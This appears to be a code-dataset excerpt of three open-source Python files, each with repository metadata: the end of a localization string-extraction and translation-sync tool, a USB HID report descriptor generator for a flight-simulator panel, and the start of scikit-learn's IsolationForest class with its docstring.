'(Events|attribute|class|\.get|Ext\.getCmp|fireEvent|\.on|Ext\.get|Ext\.reg|\.set|child|\.selectValue|class)\(\s*',
'throw ', 'var [\w]+ \=\s?', '\w=', 'attr\s?=\s?', 'return ', 'record\.data\[']
excludeIfAfter = [':']
found = [f for f in FIND_SINGLE_PAT.finditer(txt)] + [f for f in FIND_DOUBLE_PAT.finditer(txt)]
i = 0
while i < len(found):
deleted = False
for f in found:
if found[i].start() > f.start() and found[i].end() < f.end():
del found[i]
deleted = True
break
if deleted:
continue
for a in excludeIfAfter:
after = re.compile(r'%s' % a, re.IGNORECASE)
if after.findall(txt[found[i].end():found[i].end()+2]):
#print txt[found[i].start():found[i].end()+2]
del found[i]
deleted = True
break
if deleted:
continue
for b in excludeIfBefore:
before = re.compile(r'%s' % b, re.IGNORECASE)
if found[i].start() < 30:
start = 0
else:
start = found[i].start()-30
if before.findall(txt[start:found[i].start()]):
#print txt[start:found[i].end()]
del found[i]
deleted = True
break
if deleted:
continue
check = found[i].group(2)
if check == '':
del found[i]
continue
if check[0] == '{' and check[len(check)-1] == '}':
del found[i]
continue
if check[0] == '.' or check[0] == '/':
del found[i]
continue
vowels = ['a', 'e', 'i', 'o', 'u']
vowel = False
alpha = False
for c in check:
if c in vowels:
vowel = True
if c.isalpha():
alpha = True
if alpha and vowel:
break
if (not vowel) or (not alpha):
del found[i]
continue
if pureHTML(check):
del found[i]
continue
i += 1
return found
def pureHTML(txt):
if txt[0] == '<' and txt[len(txt)-1] == '>':
find = ALT_PAT.findall(txt)
if find:
return False
prev = False
for c in txt:
if prev:
if c != '<' and c != '{':
return False
prev = False
if c == '>':
prev = True
lastFound = txt.find('>')
while lastFound > -1 and lastFound < len(txt)-1:
if txt[lastFound+1] != '<':
if txt[lastFound+1] != '{':
return False
close = txt.find('}',lastFound)
if txt[close+1] != '<':
return False
lastFound = txt.find('>', lastFound+1)
return True
return False
def parseSrc(path, relpath, component):
txt = _read(path)
nextInactiveBlock = codescan.pickInactiveBlockFinder(path)
# Remove all the inactive blocks from our analysis.
txt = codescan.getActiveBlocksOnly(txt, nextInactiveBlock)
matches = cvtMatches([m for m in GETTEXT_PAT.finditer(txt)], txt, relpath, 3, 3, 'en')
found = cvtMatches(findMisses(txt), txt, relpath, 2, 2, 'en')
formatSpecErr = cvtMatches([m for m in FORMAT_SPECIFIERS_PAT.finditer(txt)], txt, relpath, 0, 0, 'en')
comments = cvtMatches([m for m in COMMENT_PAT.finditer(txt)], txt, relpath, 0, 0, 'en')
if found:
cr = path[0:path.find(relpath)]
doNotExtract = file(os.path.join(cr, 'buildscripts/.do-not-extract.txt').replace('\\', '/')).read().split('\n')
doNotExtract += file(os.path.join(cr, component, '.do-not-extract.txt').replace('\\', '/')).read().split('\n')
i = 0
while i < len(found):
deleted = False
if found[i].id in doNotExtract:
del found[i]
continue
for m in matches:
if deleted:
break
if m.id == found[i].id:
if m.fileLocs[0].line == found[i].fileLocs[0].line:
del found[i]
deleted = True
for err in formatSpecErr:
if deleted:
break
if err.fileLocs[0].line == found[i].fileLocs[0].line:
del found[i]
deleted = True
for c in comments:
if deleted:
break
if c.fileLocs[0].line == found[i].fileLocs[0].line:
del found[i]
deleted = True
if deleted:
continue
i += 1
if matches:
pass #print(relpath)
return matches, found, formatSpecErr
def parseTrans(path, relpath, locale):
txt = _read(path)
nextInactiveBlock = codescan.pickInactiveBlockFinder(path)
# Remove all the inactive blocks from our analysis.
txt = codescan.getActiveBlocksOnly(txt, nextInactiveBlock)
matches = cvtMatches([m for m in TRANS_PAT.finditer(txt)], txt, relpath, 2, 4, locale)
if matches:
pass #print(relpath)
return matches
class FakeFile:
def __init__(self):
self.txt = ''
def write(self, txt):
self.txt += txt
def printf(self, txt):
print (txt)
self.write('%s\n' % txt)
class LocData:
def __init__(self, root, testing=False):
self._svnInfo = None
self.trans = {}
self.src = {}
self.byLocale = {}
self.pathsByComponent = {}
self.possibleMisses = {}
self.formatErrors = {}
root = ioutil.norm_folder(root)
self.conf = metadata.Conf(root, report=False)
if type(root) == _STR_TYPE:
root = unicode(root, 'utf-8')
self.root = root
if not testing:
fileCount, folderCount = metadata.visit(self.root, visitor=self, recurser=self, report=False)
self._connect()
def getComponent(self, relpath):
if os.name == 'nt':
relpath = relpath.replace('\\', '/')
i = relpath.find('/')
if i > -1:
return relpath[0:i]
return relpath
def getNamingPat(self, relpath):
if os.name == 'nt':
relpath = relpath.replace('\\', '/')
m = STRINGSFILE_PAT.match(relpath)
assert(m)
pat = 'strings-%s'
if m.group(1):
pat = m.group(1) + pat
if m.group(3):
pat = pat + '.' + m.group(3)
return pat
def select(self, folder, dirs):
if folder == self.root:
for d in dirs[:]:
conf = metadata.Conf(os.path.join(folder, d), report=False)
tl = conf.getTargetedLocales()
if tl:
if len(tl) == 1 and 'en' in tl:
if conf.report:
print("Ignoring %s, since it doesn't support localization." % d)
dirs.remove(d)
for d in dirs[:]:
if d.lower().startswith('test'):
dirs.remove(d)
return dirs
def visit(self, folder, item, relativePath):
baseFolder = folder.replace(relativePath, '')
truncated = folder
if baseFolder[-1] == '/':
startFolder = baseFolder[0:baseFolder.rfind('/')]
else:
startFolder = baseFolder
while truncated != startFolder:
truncated = truncated[0:truncated.rfind('/')]
if metadata.METADATA_FILE in os.listdir(truncated):
conf = metadata.Conf(truncated, report=False)
break
else:
conf = None
uiPaths = conf.getUiPaths()
for ui in uiPaths:
if relativePath.find(uiPaths[ui]) > -1:
files = os.listdir(folder)
fullpath = os.path.join(folder, item)
relpath = relativePath + item
if type(relpath) == _STR_TYPE:
relpath = unicode(relativePath + item, 'utf-8')
m = STRINGSFILE_PAT.match(item)
if m:
component = self.getComponent(relpath)
namingPat = self.getNamingPat(relpath)
old = self.pathsByComponent.get(component, None)
if old:
for o in old:
oldUI, oldPat = o
if oldUI == conf.getUi(relativePath):
if namingPat != oldPat:
print('Warning: %s does not match naming pattern %s. Components have some flexibility in how strings files are named and located, but must be internally consistent.' % (relpath, namingPat))
else:
if self.pathsByComponent[component].count((conf.getUi(relativePath), namingPat)) == 0:
self.pathsByComponent[component].append((conf.getUi(relativePath), namingPat))
else:
self.pathsByComponent[component] = [(conf.getUi(relpath), namingPat)]
if not CANONICAL_STRINGSFILE_PAT.match(item):
print('Warning: %s does not match the canonical naming pattern for strings files ([prefix-]strings-xx[_YY]*.*).' % item)
self.trans[relpath] = parseTrans(fullpath, relpath, m.group(2))
else:
data, misses, formatErr = parseSrc(fullpath, relpath, self.getComponent(relpath))
if data:
self.src[relpath] = data
if misses:
self.possibleMisses[relpath] = misses
if formatErr:
self.formatErrors[relpath] = formatErr
def getTargetedLocales(self, component):
x = self.conf.getTargetedLocales(component)
if not x:
x = pslocale.getStandardLocales()
return x
def update(self, relpath):
txt = self.getTransText(relpath)
if txt:
fullpath = self.root + relpath
add = not os.path.isfile(fullpath)
if ioutil.write_if_different(fullpath, txt, compare_func=jsIsDifferent):
if add:
os.system('bzr add %s' % fullpath)
else:
print('%s has been modified and needs to be checked in.' % relpath)
return True
return False
def getTransText(self, relpath):
txt = u''
m = STRINGSFILE_PAT.match(relpath)
locale = m.group(2)
trans = self.byLocale.get(locale, None)
if trans:
en = self.byLocale['en']
ids = trans.keys()[:]
ids.sort()
for id in ids:
if id in en:
t = trans[id]
txt += u' "%s": "%s",\n' % (prepForJson(t.id), prepForJson(t.txt))
if txt:
txt = u'{\n vocabulary: {\n' + txt[0:-2] + u'\n }\n}\n'
else:
txt += u'{\n}\n'
txt = JS_HEADER + txt
return txt
def fileNeedsSync(self, relpath):
txt = self.getTransText(relpath)
if txt:
return ioutil.file_differs_from_text(self.root + relpath, txt, compare_func=jsIsDifferent)
return False
def exportFile(self, fullpath, relpath):
m = STRINGSFILE_PAT.match(fullpath)
locale = m.group(2)
fullpath += '.xml'
txt = TRANSFILE_HEADER % locale
trans = self.byLocale.get(locale, None)
if not trans:
trans = {}
en = self.byLocale['en']
ids = en.keys()[:]
ids.sort()
newCount = 0
reviewCount = 0
wordCountEng = 0
wordCountTrans = 0
chunk = u''
for id in ids:
enstr = en[id]
add = False
for loc in enstr.fileLocs:
if relpath[0:relpath.rfind('/')] in loc.path:
add = True
if add:
if not id in trans or trans[id].getValue() == u'?':
newCount += 1
else:
reviewCount += 1
if id in trans:
wordCountTrans += trans[id].getWordCount()
wordCountEng += en[id].getWordCount()
if id in trans:
strdef = trans[id]
else:
strdef = StrDef(id, '?', locale)
chunk += u' <string>\n'
chunk += u' <val lang="en">%s</val>\n' % prepForXml(enstr.getValue())
note = enstr.getNote()
if note:
chunk += u' <note lang="en">%s</note>\n' % note
warnings = enstr.getWarnings()
if warnings:
enstr.warn()
chunk += u' <warnings>' + ' '.join(warnings) + u'</warnings>\n'
chunk += u' <val lang="%s">%s</val>\n' % (locale, prepForXml(strdef.getValue()))
chunk += u' </string>\n\n'
txt += u' <info>\n'
txt += u' <newStrings>%d</newStrings>\n' % newCount
txt += u' <reviewStrings>%d</reviewStrings>\n' % reviewCount
txt += u' <numStrings>%d</numStrings>\n' % (newCount + reviewCount)
txt += u' <wordCountEnglish>%d</wordCountEnglish>\n' % wordCountEng
txt += u' <wordCount%s>%d</wordCount%s>\n' % (locale, wordCountTrans, locale)
txt += u' <relativePath>%s</relativePath>\n' % relpath
txt += u' </info>\n\n'
txt += chunk
txt += u'</strings>\n'
ioutil.write_if_different(fullpath, txt)
print(fullpath)
def generateMartian(self):
en = self.byLocale['en']
ma = {}
for id in en.keys():
strdef = en[id]
ma[id] = StrDef(strdef.id, martian.convert(strdef.txt), 'ma')
return ma
def getProject(self):
return sandbox.create_from_within(self.conf.path).get_top_component()
def get_branch(self):
return sandbox.create_from_within(self.conf.path).get_branch()
def getRevision(self):
sb = sandbox.create_from_within(self.conf.path)
branchLocation = os.path.join(sb.get_code_root(), sb.get_top_component())
return vcs.revno(branchLocation, True)
cwd = os.getcwd()
os.chdir(branchLocation)
p = subprocess.Popen(['bzr', 'revno', '--tree'], stdout=subprocess.PIPE)
revno = p.stdout.read().strip()
os.chdir(cwd)
return revno
def getBatchName(self):
bn = self.getProject() + '-'
br = self.get_branch()
if br != 'trunk':
bn += br + '-'
return bn + str(self.getRevision())
def export(self, folder):
if os.path.exists(folder):
assert(os.path.isdir(folder))
path = ioutil.norm_folder(folder) + self.getBatchName() + '/'
print('exporting to %s' % path)
if os.path.exists(path):
ioutil.nuke(path)
os.makedirs(path)
for component in self.pathsByComponent:
locales = self.getTargetedLocales(component)
pathPats = self.pathsByComponent[component]
for paths in pathPats:
pathPat = paths[1]
for loc in locales:
if loc != 'en':
relpath = pathPat % loc
fullpath = path + relpath
fldr = os.path.dirname(fullpath)
if not os.path.exists(fldr):
os.makedirs(fldr)
self.exportFile(fullpath, relpath)
self.zip(folder)
def sync(self):
updateCount = 0
for component in self.pathsByComponent:
locales = self.getTargetedLocales(component)
if not ('ma' in locales):
locales.append('ma')
self.byLocale['ma'] = self.generateMartian()
for component in self.pathsByComponent.keys():
pathPats = self.pathsByComponent[component]
for paths in pathPats:
pathPat = paths[1]
for loc in locales:
if loc != 'en':
relpath = pathPat % loc
if self.update(relpath):
updateCount += 1
print('Updated %d files.' % updateCount)
def check(self, component=''):
strsWithWarnings = [self.byLocale['en'][id] for id in self.byLocale['en'].keys()]
strsWithWarnings = [x for x in strsWithWarnings if x.getWarnings()]
needsSync = []
locales = self.getTargetedLocales(component)
if not ('ma' in locales):
locales.append('ma')
self.byLocale['ma'] = self.generateMartian()
for component in self.pathsByComponent.keys():
pathPats = self.pathsByComponent[component]
for paths in pathPats:
pathPat = paths[1]
for loc in locales:
if loc != 'en':
relpath = pathPat % loc
if self.fileNeedsSync(relpath):
needsSync.append(relpath)
return strsWithWarnings, needsSync
def checkComplete(self, component=''):
supportedLocales = []
exitCode = 0
locales = pslocale.getStandardLocales()
for loc in self.getTargetedLocales(component):
if not (loc in locales):
locales.append(loc)
for loc in self.byLocale.keys():
if not (loc in locales):
locales.append(loc)
if not ('ma' in locales):
locales.append('ma')
self.byLocale['ma'] = self.generateMartian()
missing = {}
for loc in locales:
if loc != 'en':
if (not loc in self.byLocale.keys()):
if loc in self.getTargetedLocales(component):
missing[loc] = self.byLocale['en'].keys()
continue
for id in self.byLocale['en'].keys():
if not id in self.byLocale[loc].keys():
if missing.get(loc, 0) == 0:
missing[loc] = [id]
else:
missing[loc].append(id)
if missing.get(loc, 0) == 0:
supportedLocales.append(loc)
print('Supported locales: %s' % supportedLocales)
#print('Targeted locales: %s' % self.conf.targetedLocales)
complete = True
for x in self.getTargetedLocales(component):
if x != 'en':
if not (x in supportedLocales):
complete = False
if not complete:
exitCode = 1
'''print ('Missing Translations')
for key in self.conf.targetedLocales:
print ('%s is missing: %s' % (key, missing[key]))'''
print ('Missing translations for '),
miss = []
for key in missing.keys():
if key in self.getTargetedLocales(component):
miss.append(key)
print (miss)
strWithWarnings, needsSync = self.check(component)
return exitCode, strWithWarnings, needsSync
def _connect(self):
self.byLocale = {}
en = {}
for file in self.src.keys():
for strdef in self.src[file]:
if strdef.id in en:
# Merge the two identical strings
en[strdef.id].addLoc(strdef.fileLocs[0])
else:
en[strdef.id] = strdef
#print('english has %d strings' % len(en.keys()))
self.byLocale['en'] = en
for file in self.trans.keys():
i = 1
for strdef in self.trans[file]:
if i == 1:
locale = strdef.locale
if locale in self.byLocale:
thisLoc = self.byLocale[locale]
else:
thisLoc = {}
self.byLocale[locale] = thisLoc
i += 1
thisLoc[strdef.id] = strdef
# See if this string exists in English.
if strdef.id in en:
src = en[strdef.id]
src.trans.append(strdef)
strdef.src = src
def gatherLocales(self, baseFolder, folder, loc):
files = os.listdir(baseFolder+folder)
locFiles = []
find = '-strings-%s.js.xml' % loc
for f in files:
if os.path.isdir(baseFolder+os.path.join(folder, f)):
locFiles.extend(self.gatherLocales(baseFolder, os.path.join(folder,f), loc))
elif os.path.isfile(baseFolder+folder+'/'+f):
if f.find(find) != -1:
locFiles.append(folder+'/'+f)
return locFiles
def zip(self, folder):
'''Zip translations by locale'''
if os.path.exists(folder):
assert(os.path.isdir(folder))
files = os.listdir(folder)
for component in self.pathsByComponent:
locales = self.getTargetedLocales(component)
for f in files:
if os.path.isdir(folder+'/'+f) and f.find('.zip') == -1:
for loc in locales:
zipFiles = self.gatherLocales(folder, f, loc)
if zipFiles != []:
zipName = f+'-'+loc+'.zip'
print 'Creating zip folder %s' % os.path.join(folder, zipName)
if os.path.exists(zipName):
ioutil.nuke(zipName)
z = zipfile.ZipFile(folder+zipName, "w", zipfile.ZIP_DEFLATED)
for zf in zipFiles:
z.write(folder+zf,zf)
def importZip(self, folder, fileLoc):
if os.path.exists(folder):
assert(os.path.isdir(folder))
else:
os.mkdir(folder)
fileFolder = fileLoc[0:fileLoc.find('.zip')]
fileFolder = fileFolder[0:fileFolder.rfind('/')]
if os.path.exists(fileFolder):
if fileLoc.find('.zip') > -1:
files = [fileLoc.strip('/')]
else:
files = glob.glob(fileLoc+'*.zip')
for f in files:
z = zipfile.ZipFile(f, 'r')
print ('Extracting folder %s' % f)
z.extractall(folder)
for x in z.namelist():
if x.find('.xml') > -1:
self.loadFile(folder, x)
def loadFile(self, baseFolder, fileName):
fileXML = codecs.open(baseFolder+fileName, 'r')
fileXML = fileXML.read().decode('UTF-8')
fileXML = accentChars(fileXML)
dom = xml.dom.minidom.parseString(fileXML.encode('UTF-8', 'xmlcharrefreplace'))
strings = dom.getElementsByTagName('string')
info = dom.getElementsByTagName('relativePath')
for i in info:
locale = _get_xml_text(i.childNodes)
loc = locale[locale.rfind('-')+1:locale.rfind('.js')]
tran = []
byLoc = {}
for s in strings:
vals = s.getElementsByTagName('val')
for v in vals:
if v.attributes['lang'].value == 'en':
id = _get_xml_text(v.childNodes)
if v.attributes['lang'].value == loc:
txt = _get_xml_text(v.childNodes)
if not txt or txt == u'?':
continue
notes = s.getElementsByTagName('note')
for note in notes:
id += '@@' + _get_xml_text(note.childNodes)
strdef = StrDef(undoPrepForXml(id), undoPrepForXml(txt), loc)
warnings = strdef.getWarnings()
for w in warnings:
print(w)
tran.append(strdef)
byLoc[id] = strdef
if byLoc and tran:
self.trans[locale] = tran
self.byLocale[loc] = byLoc
self.update(locale)
def find(self, path):
for key in self.formatErrors:
print ('%s%s\n' % (path, key))
for line in self.formatErrors[key]:
printc(WARNING_COLOR + 'Please change to the correct format specifiers on line %d.' % line.fileLocs[0].line + ERROR_COLOR)
printc("%s\n" % line.id + NORMTXT)
printc(CMD_COLOR + ''.rjust(80, '*') + NORMTXT)
doNotExtract = open(path+'.do-not-extract.txt', 'a')
num = 0
ff = FakeFile()
for key in self.possibleMisses:
num += len(self.possibleMisses[key])
try:
try:
print ("%d possible missed strings." % num)
fileNum = 1
for key in self.possibleMisses:
printc(CMD_COLOR + '\nFile %d of %d Files' % (fileNum, len(self.possibleMisses)) + NORMTXT)
fileNum += 1
ff.printf('%s%s\n' % (path,key))
printc(CMD_COLOR + '%s possible misses in this file.\n' % len(self.possibleMisses[key]) + NORMTXT)
f = open(path+'/'+key, 'r+')
lines = f.readlines()
for miss in self.possibleMisses[key]:
start = lines[miss.fileLocs[0].line-1].find(miss.id)-1
end = start + len(miss.id)+2
autoCorrect = ['text:\s?', 'header:\s?', 'title:\s?', 'msg:\s?', 'label:\s?']
auto = False
for ac in autoCorrect:
correct = re.compile(r'%s' % ac, re.IGNORECASE)
if correct.search(lines[miss.fileLocs[0].line-1][start-len(ac):start]):
ff.printf('Auto change (from-to) line %s\n %s' % (miss.fileLocs[0].line, lines[miss.fileLocs[0].line-1].strip()))
line = lines[miss.fileLocs[0].line-1]
lines[miss.fileLocs[0].line-1] = line[0:start] + '_(' + line[start:end] + ')' + line[end:len(line)]
ff.printf('%s\n' % lines[miss.fileLocs[0].line-1].strip())
f.seek(0)
f.writelines(lines)
auto = True
break
if auto:
continue
answer = ''
while not answer:
printc(DELIM_COLOR + '%s %s' % (miss.fileLocs[0].line-1, lines[miss.fileLocs[0].line-2].strip()) + NORMTXT)
printc(DELIM_COLOR + str(miss.fileLocs[0].line) + ' ' + TITLE_COLOR + lines[miss.fileLocs[0].line-1][0:start].lstrip() + WARNING_COLOR + lines[miss.fileLocs[0].line-1][start:end] + TITLE_COLOR + lines[miss.fileLocs[0].line-1][end:len(lines[miss.fileLocs[0].line-1])] + NORMTXT)
if miss.fileLocs[0].line < len(lines):
printc(DELIM_COLOR +'%s %s' % (miss.fileLocs[0].line+1, lines[miss.fileLocs[0].line].strip()) + NORMTXT)
print ('')
answer = raw_input('Is this string suppose to be translated {(y)es/(n)o/(s)kip/(e)dit}?[s]\n%s\t: ' % miss.id)
print ('')
if answer == '':
answer = 's'
if 'ty1'.find(answer.lower()[0]) != -1:
ff.write('Auto change (from-to) line %s\n %s' % (miss.fileLocs[0].line, lines[miss.fileLocs[0].line-1].strip()))
line = lines[miss.fileLocs[0].line-1]
lines[miss.fileLocs[0].line-1] = line[0:start] + '_(' + line[start:end] + ')' + line[end:len(line)]
ff.write('%s\n' % lines[miss.fileLocs[0].line-1].strip())
f.seek(0)
f.writelines(lines)
elif 'fn0'.find(answer.lower()[0]) != -1:
doNotExtract.write(miss.id+'\n')
elif 's'.find(answer.lower()[0]) != -1:
pass
elif 'e'.find(answer.lower()[0]) != -1:
if os.name == 'nt':
os.system('start notepad %s' % ('%s/%s' % (path,key)))
else:
os.system('vi -R %s' % ('%s/%s' % (path,key)))
else:
print ('Not a vaild response')
answer = ''
f.close()
except KeyboardInterrupt:
f.close()
finally:
sb = sandbox.create_from_within(path)
if not os.path.exists(os.path.join(sb.get_root(), 'translations')):
os.mkdir(os.path.join(sb.get_root(), 'translations'))
cl = open(os.path.join(sb.get_root(),'translations','LocChanges.log'), 'w')
cl.write(ff.txt)
doNotExtract.close()
| perfectsearch/sandman | code/buildscripts/l10n/locdata.py | Python | mit | 37,139 | [
"VisIt"
] | 1b8463bb29bbb0d086081f91191ff1961cf38fbbfe3c3ad7b4763bc2c0ee009f |
#!/usr/bin/python3
#
# flightpanel - A Cortex-M4 based USB flight panel for flight simulators.
# Copyright (C) 2017-2017 Johannes Bauer
#
# This file is part of flightpanel.
#
# flightpanel is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; this program is ONLY licensed under
# version 3 of the License, later versions are explicitly excluded.
#
# flightpanel is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with flightpanel; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Johannes Bauer <JohannesBauer@gmx.de>
from GeneralEnums import *
from SpecificEnums import *
from DescriptorParser import DescriptorParser
class USBHidReportDescriptor(object):
def __init__(self):
self._data = [ ]
self._offset = 0
self._last_report_count = None
self._last_report_size = None
self._report_length = 0
self._comments = { }
@property
def comments(self):
return self._comments
def _append(self, data, comment = None):
if comment is not None:
self._comments[len(self._data)] = comment
if self._offset == 0:
self._data += data
else:
for value in data:
self._data.insert(self._offset, value)
def _at_offset(self, index):
clone = USBHidReportDescriptor()
clone._data = self._data
clone._offset += index
return clone
def _add_item(self, enum, data, comment = None):
value = int(enum) << 2
if data is None:
encoding = [ ]
elif 0 <= data <= 255:
value |= 0b01
encoding = [ data ]
elif 256 <= data <= 65535:
value |= 0b10
encoding = [ (data >> 0) & 0xff, (data >> 8) & 0xff ]
else:
raise Exception("Unsupported.")
self._append([ value ] + encoding, comment = comment)
return self
def add_usage_page(self, usage_page):
self._add_item(Item.UsagePage, usage_page)
return self
def add_usage(self, usage, comment = None):
self._add_item(Item.Usage, usage, comment = comment)
return self
def add_collection(self, collection_type):
self._append([ 0xa1, int(collection_type), 0xc0 ])
return self._at_offset(-1)
def add_usage_minimum(self, min_value):
self._add_item(Item.UsageMinimum, min_value)
return self
def add_usage_maximum(self, max_value):
self._add_item(Item.UsageMaximum, max_value)
return self
def add_report_count(self, report_count):
self._last_report_count = report_count
self._add_item(Item.ReportCount, report_count)
return self
def add_report_size(self, report_size, round_up = True):
if round_up:
report_size = (report_size + 7) // 8 * 8
self._last_report_size = report_size
self._add_item(Item.ReportSize, report_size)
return self
def add_report_id(self, report_id):
self._add_item(Item.ReportID, report_id)
return self
def add_input(self, input_flags, comment = None):
self._report_length += self._last_report_count * self._last_report_size
self._add_item(Item.Input, input_flags, comment = comment)
return self
def add_output(self, output_flags, comment = None):
self._report_length += self._last_report_count * self._last_report_size
self._add_item(Item.Output, output_flags, comment = comment)
return self
def add_logical_minimum(self, min_value):
self._add_item(Item.LogicalMinimum, min_value)
return self
def add_logical_maximum(self, max_value):
self._add_item(Item.LogicalMaximum, max_value)
return self
def add_unit(self, unit):
self._add_item(Item.Unit, unit)
return self
def add_unit_exponent(self, unit_exponent):
self._add_item(Item.UnitExponent, unit_exponent)
return self
def add_padding_bits(self, count, comment = None):
self.add_report_count(1)
self.add_report_size(count, round_up = False)
self.add_input(InputOutputFeatureFlags.Constant, comment = comment)
def add_pushbuttons(self, count, start_button = 1, comment = None):
self.add_usage_page(UsagePage.Button)
self.add_usage_minimum(start_button)
self.add_usage_maximum(start_button + count - 1)
self.add_logical_minimum(0)
self.add_logical_maximum(1)
self.add_report_count(count)
self.add_report_size(1, round_up = False)
self.add_input(InputOutputFeatureFlags.Variable, comment)
return self
def add_output_bytes(self, count, comment = None):
self.add_report_count(count)
self.add_report_size(8)
self.add_output(InputOutputFeatureFlags.Variable, comment = comment)
def fp_add_as_button(self, text, button_count, start_button = 1):
padding_bits = 8 - (button_count % 8)
self.add_pushbuttons(button_count, start_button, comment = text)
if padding_bits != 8:
self.add_padding_bits(padding_bits, comment = "Padding (%d bit)" % (padding_bits))
def fp_add_items(self, items):
def _emit(values):
if len(values) == 0:
return
collection.add_usage_page(UsagePage.SimulationControls)
for (text, size_bytes) in values:
collection.add_usage(SimulationControls.FlightCommunication, comment = text)
size_bytes = values[0][1]
collection.add_logical_minimum(0)
collection.add_logical_maximum((256 ** size_bytes) - 1)
collection.add_report_count(len(values))
collection.add_report_size(size_bytes * 8)
collection.add_input(InputOutputFeatureFlags.Variable | InputOutputFeatureFlags.Volatile)
similar = [ ]
for (text, byte_length) in items:
if (len(similar) != 0) and (similar[0][1] != byte_length):
_emit(similar)
similar = [ ]
similar.append((text, byte_length))
_emit(similar)
@property
def report_length(self):
return self._report_length
def __bytes__(self):
return bytes(self._data)
hid_report = USBHidReportDescriptor()
hid_report.add_usage_page(UsagePage.GenericDesktop)
# Logical min 0?
hid_report.add_usage(GenericDesktop.Joystick)
collection = hid_report.add_collection(Collection.Application)
collection.add_report_id(1)
collection.fp_add_items([
("Sequence number", 1),
("Radio panel", 1),
("COM divisions", 1),
("NAV divisions", 1),
("TX radio ID", 1),
("DME nav ID", 1),
("COM1 frequency active index", 2),
("COM1 frequency standby index", 2),
("COM2 frequency active index", 2),
("COM2 frequency standby index", 2),
("NAV1 frequency active index", 2),
("NAV1 frequency standby index", 2),
("NAV1 obs", 2),
("NAV2 frequency active index", 2),
("NAV2 frequency standby index", 2),
("NAV2 obs", 2),
("XPDR state", 1),
("XPDR squawk", 2),
("ADF frequency", 2),
("AP state", 2),
("AP altitude", 2),
("AP heading", 2),
("AP IAS", 2),
("AP climbrate", 2),
("Flip switches", 1),
("QNH", 2),
("Nav by GPS", 1),
])
collection.add_report_id(2)
collection.add_usage_page(UsagePage.GenericDesktop)
collection.add_usage(GenericDesktop.Undefined)
collection.add_output_bytes(44)
collection.add_report_id(3)
collection.add_usage_page(UsagePage.GenericDesktop)
collection.add_usage(GenericDesktop.Undefined)
collection.add_output_bytes(27)
data = bytes(hid_report)
print("// " + data.hex())
print("// Report length %d bits = %d bytes" % (collection.report_length, (collection.report_length + 7) // 8))
print()
print("static uint8_t HIDReportDescriptor[] = {")
DescriptorParser(base_indent = 1).dump(data, comments = hid_report.comments)
print("};")
| johndoe31415/flightpanel | usb-descriptor-tool/usb_descriptor_gen.py | Python | gpl-3.0 | 7,456 | [
"ADF"
] | f85c971ae269f983d92049deb9f6ef2e1851e6c9345759d696542ad01c3c310e |
# Authors: Nicolas Goix <nicolas.goix@telecom-paristech.fr>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# License: BSD 3 clause
import numbers
import numpy as np
from scipy.sparse import issparse
from warnings import warn
from ..tree import ExtraTreeRegressor
from ..utils import (
check_random_state,
check_array,
gen_batches,
get_chunk_n_rows,
)
from ..utils.fixes import _joblib_parallel_args
from ..utils.validation import check_is_fitted, _num_samples
from ..utils.validation import _deprecate_positional_args
from ..base import OutlierMixin
from ._bagging import BaseBagging
__all__ = ["IsolationForest"]
class IsolationForest(OutlierMixin, BaseBagging):
"""
Isolation Forest Algorithm.
Return the anomaly score of each sample using the IsolationForest algorithm
The IsolationForest 'isolates' observations by randomly selecting a feature
and then randomly selecting a split value between the maximum and minimum
values of the selected feature.
Since recursive partitioning can be represented by a tree structure, the
number of splittings required to isolate a sample is equivalent to the path
length from the root node to the terminating node.
This path length, averaged over a forest of such random trees, is a
measure of normality and our decision function.
Random partitioning produces noticeably shorter paths for anomalies.
Hence, when a forest of random trees collectively produce shorter path
lengths for particular samples, they are highly likely to be anomalies.
Read more in the :ref:`User Guide <isolation_forest>`.
.. versionadded:: 0.18
Parameters
----------
n_estimators : int, default=100
The number of base estimators in the ensemble.
max_samples : "auto", int or float, default="auto"
The number of samples to draw from X to train each base estimator.
- If int, then draw `max_samples` samples.
- If float, then draw `max_samples * X.shape[0]` samples.
- If "auto", then `max_samples=min(256, n_samples)`.
If max_samples is larger than the number of samples provided,
all samples will be used for all trees (no sampling).
contamination : 'auto' or float, default='auto'
The amount of contamination of the data set, i.e. the proportion
of outliers in the data set. Used when fitting to define the threshold
on the scores of the samples.
- If 'auto', the threshold is determined as in the
original paper.
- If float, the contamination should be in the range (0, 0.5].
.. versionchanged:: 0.22
The default value of ``contamination`` changed from 0.1
to ``'auto'``.
max_features : int or float, default=1.0
The number of features to draw from X to train each base estimator.
- If int, then draw `max_features` features.
- If float, then draw `max_features * X.shape[1]` features.
bootstrap : bool, default=False
If True, individual trees are fit on random subsets of the training
data sampled with replacement. If False, sampling without replacement
is performed.
n_jobs : int, default=None
The number of jobs to run in parallel for both :meth:`fit` and
:meth:`predict`. ``None`` means 1 unless in a
:obj:`joblib.parallel_backend` context. ``-1`` means using all
processors. See :term:`Glossary <n_jobs>` for more details.
random_state : int, RandomState instance or None, default=None
Controls the pseudo-randomness of the selection of the feature
and split values for each branching step and each tree in the forest.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
verbose : int, default=0
Controls the verbosity of the tree building process.
warm_start : bool, default=False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest. See :term:`the Glossary <warm_start>`.
.. versionadded:: 0.21
Attributes
----------
base_estimator_ : ExtraTreeRegressor instance
The child estimator template used to create the collection of
fitted sub-estimators.
estimators_ : list of ExtraTreeRegressor instances
The collection of fitted sub-estimators.
estimators_features_ : list of ndarray
The subset of drawn features for each base estimator.
estimators_samples_ : list of ndarray
The subset of drawn samples (i.e., the in-bag samples) for each base
estimator.
max_samples_ : int
The actual number of samples.
offset_ : float
Offset used to define the decision function from the raw scores. We
have the relation: ``decision_function = score_samples - offset_``.
``offset_`` is defined as follows. When the contamination parameter is
set to "auto", the offset is equal to -0.5 as the scores of inliers are
close to 0 and the scores of outliers are close to -1. When a
contamination parameter different than "auto" is provided, the offset
is defined in such a way we obtain the expected number of outliers
(samples with decision function < 0) in training.
.. versionadded:: 0.20
